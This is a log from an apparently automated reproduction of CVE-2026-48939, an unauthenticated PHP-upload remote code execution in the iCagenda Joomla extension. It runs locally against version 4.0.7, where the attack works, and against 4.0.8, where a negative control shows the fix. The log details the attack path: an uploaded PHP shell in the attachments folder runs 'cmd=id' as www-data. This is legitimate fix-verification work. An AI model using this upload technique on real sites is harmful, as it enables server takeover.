[INFO] 2026-07-06T14:56:55+00:00 CVE-2026-48939 iCagenda PHP upload RCE reproduction starting [INFO] 2026-07-06T14:56:55+00:00 Using cache root: /data/pruva/project-cache/21f75b67-70b1-47d7-9acf-f9f7949378cf/repo [INFO] 2026-07-06T14:56:55+00:00 Docker host IP from worker: 172.20.0.1 [INFO] 2026-07-06T14:56:55+00:00 Reusing cached icagenda-4-0-7-package.zip from /data/pruva/project-cache/21f75b67-70b1-47d7-9acf-f9f7949378cf/repo/icagenda-4-0-7-package.zip [INFO] 2026-07-06T14:56:55+00:00 Reusing cached icagenda-4-0-8-package.zip from /data/pruva/project-cache/21f75b67-70b1-47d7-9acf-f9f7949378cf/repo/icagenda-4-0-8-package.zip [INFO] 2026-07-06T14:56:55+00:00 ===== Starting vulnerable product stack on port 18139 ===== Network vulnerable_stack_default Creating Network vulnerable_stack_default Created Container vulnerable_stack-db-1 Creating Container vulnerable_stack-db-1 Created Container vulnerable_stack-joomla-1 Creating Container vulnerable_stack-joomla-1 Created Container vulnerable_stack-db-1 Starting Container vulnerable_stack-db-1 Started Container vulnerable_stack-db-1 Waiting Container vulnerable_stack-db-1 Healthy Container vulnerable_stack-joomla-1 Starting Container vulnerable_stack-joomla-1 Started [INFO] 2026-07-06T14:57:17+00:00 Waiting for Joomla vulnerable on http://172.20.0.1:18139/ [INFO] 2026-07-06T14:57:37+00:00 Joomla vulnerable healthcheck passed [INFO] 2026-07-06T14:57:37+00:00 Installing iCagenda package for vulnerable from official URL https://www.joomlic.com/download/icagenda/icagenda-core-4-0-7/package-icagenda-core-4-0-7-zip Install Extension ================= [OK] Extension installed successfully. [INFO] 2026-07-06T14:57:41+00:00 Source/loader evidence for vulnerable saved to logs/vulnerable_source.log [INFO] 2026-07-06T14:57:41+00:00 Configuring public iCagenda submit menu/form for vulnerable mysql: [Warning] Using a password on the command line interface can be insecure. [INFO] 2026-07-06T14:57:42+00:00 vulnerable: public form reached with Itemid=112, catid=1, CSRF=3a967a0cef32309d0af72b403b1c7711 [INFO] 2026-07-06T14:57:42+00:00 vulnerable: submitting unauthenticated event form with PHP attachment pruva-rce-vulnerable.php index.html 47 bytes pruva-rce-vulnerable.php 258 bytes [INFO] 2026-07-06T14:57:42+00:00 vulnerable: requesting uploaded PHP URL http://172.20.0.1:18139/images/icagenda/frontend/attachments/pruva-rce-vulnerable.php?cmd=id [INFO] 2026-07-06T14:57:42+00:00 vulnerable: uploaded PHP fetch returned HTTP 200; response saved to /data/pruva/runs/a3928cf6-d9aa-49be-a37a-7ca03155f786/bundle/repro/fetch_vulnerable_rce.log HTTP/1.1 200 OK Date: Mon, 06 Jul 2026 14:57:42 GMT Server: Apache/2.4.66 (Debian) X-Powered-By: PHP/8.3.30 Vary: Accept-Encoding Content-Length: 158 Content-Type: text/plain;charset=UTF-8 PRUVA_PHP_SHELL_ACTIVE_VULNERABLE PRUVA_ATTACKER_COMMAND_OUTPUT_BEGIN uid=33(www-data) gid=33(www-data) groups=33(www-data) PRUVA_ATTACKER_COMMAND_OUTPUT_END [INFO] 2026-07-06T14:57:50+00:00 Vulnerable iCagenda 4.0.7 RCE confirmed: uploaded PHP executed attacker-controlled cmd=id as www-data [INFO] 2026-07-06T14:57:50+00:00 ===== Starting fixed product stack on port 18140 ===== Network fixed_stack_default Creating Network fixed_stack_default Created Container fixed_stack-db-1 Creating Container fixed_stack-db-1 Created Container fixed_stack-joomla-1 Creating Container fixed_stack-joomla-1 Created Container fixed_stack-db-1 Starting Container fixed_stack-db-1 Started Container fixed_stack-db-1 Waiting Container fixed_stack-db-1 Healthy Container fixed_stack-joomla-1 Starting Container fixed_stack-joomla-1 Started [INFO] 2026-07-06T14:58:12+00:00 Waiting for Joomla fixed on http://172.20.0.1:18140/ [INFO] 2026-07-06T14:58:32+00:00 Joomla fixed healthcheck passed [INFO] 2026-07-06T14:58:32+00:00 Installing iCagenda package for fixed from official URL https://www.joomlic.com/download/icagenda/icagenda-core-4-0-8/package-icagenda-core-4-0-8-zip Install Extension ================= [OK] Extension installed successfully. [INFO] 2026-07-06T14:58:36+00:00 Source/loader evidence for fixed saved to logs/fixed_source.log [INFO] 2026-07-06T14:58:36+00:00 Configuring public iCagenda submit menu/form for fixed mysql: [Warning] Using a password on the command line interface can be insecure. [INFO] 2026-07-06T14:58:36+00:00 fixed: public form reached with Itemid=112, catid=1, CSRF=ebd2e0ac94e60ead3437c95ae8eb0203 [INFO] 2026-07-06T14:58:36+00:00 fixed: submitting unauthenticated event form with PHP attachment pruva-rce-fixed.php attachments directory absent [INFO] 2026-07-06T14:58:37+00:00 fixed: requesting uploaded PHP URL http://172.20.0.1:18140/images/icagenda/frontend/attachments/pruva-rce-fixed.php?cmd=id [INFO] 2026-07-06T14:58:37+00:00 fixed: uploaded PHP fetch returned HTTP 404; response saved to /data/pruva/runs/a3928cf6-d9aa-49be-a37a-7ca03155f786/bundle/repro/fetch_fixed_rce.log HTTP/1.1 404 Not Found Date: Mon, 06 Jul 2026 14:58:37 GMT Server: Apache/2.4.66 (Debian) X-Powered-By: PHP/8.3.30 Set-Cookie: 9deb034e6a63d6a4bcc5087a8b0a24b8=233d5b45aab9144136657ece8fb4ef19; path=/; HttpOnly x-frame-options: SAMEORIGIN referrer-policy: strict-origin-when-cross-origin cross-origin-opener-policy: same-origin Expires: Wed, 17 Aug 2005 00:00:00 GMT Last-Modified: Mon, 06 Jul 2026 14:58:37 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 3989 Content-Type: text/html; charset=utf-8 Error: 404 [INFO] 2026-07-06T14:58:44+00:00 Fixed iCagenda 4.0.8 negative control passed: PHP shell was not stored/executed [INFO] 2026-07-06T14:58:44+00:00 CVE-2026-48939 confirmed with code execution and fixed-version negative control